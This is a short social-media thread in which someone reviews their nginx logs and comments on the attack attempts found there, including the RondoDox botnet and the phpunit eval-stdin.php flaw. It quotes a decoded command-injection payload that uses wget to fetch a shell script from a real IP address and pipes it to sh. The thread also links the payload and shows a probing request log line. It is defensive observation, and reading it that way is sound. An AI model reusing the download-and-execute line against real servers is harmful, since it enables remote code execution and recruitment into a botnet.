Apparently some servers support a GET request that will curl a random bash script from the internet and run it. Useful feature, that. (Adventures in reading my nginx logs)

Decodes to:

cat_id=${system(wget -qO- http://74.194.191.52/rondo.wcr.sh|sh)}

I have to admire the use of POSIX-compliant shell.

Payload is here if anyone is curious: https://pastes.io/wcrrondosh

Obviously don't run it but I love that if you get down far enough it will try to execute a Motorola 68k binary

Pastes.io

wcr.rondo.sh

Pastes.io

4.217.221.207 - - [12/Nov/2025:23:27:53 +0000] "GET /xmrlpc.php HTTP/1.1" 404 146 "-" "-"

That's not how you spell xmlrpc, and that's not where wordpress puts that

Faintly surprised to learn from a malware binary payload that there are ARC 700 systems running systemd. I didn't even know these things had virtual memory

I'd guess it's a variant of this: https://www.fortinet.com/blog/threat-research/rondobox-unveiled-breaking-down-a-botnet-threat

Mine has an identical init.d script format string embedded, not obfuscated, it just comes out with `strings` lol

RondoDox Unveiled: Breaking Down a New Botnet Threat | FortiGuard Labs

FortiGuard Labs analyzes RondoDox, a stealthy new botnet targeting TBK DVRs and Four-Faith routers via CVE-2024-3721 and CVE-2024-12856. Learn how it evades detection, establishes persistence, and …

Fortinet Blog

Based on nginx logs there is a package called phpunit which ships a file called, and I am 100% serious, `eval-stdin.php`.

Feels like security research is 10% the most intense shit you've ever seen and 90% "oh no! we left the untrusted strings next to the String Executor!"

It does exactly what you think btw https://nvd.nist.gov/vuln/detail/cve-2017-9841
NVD - cve-2017-9841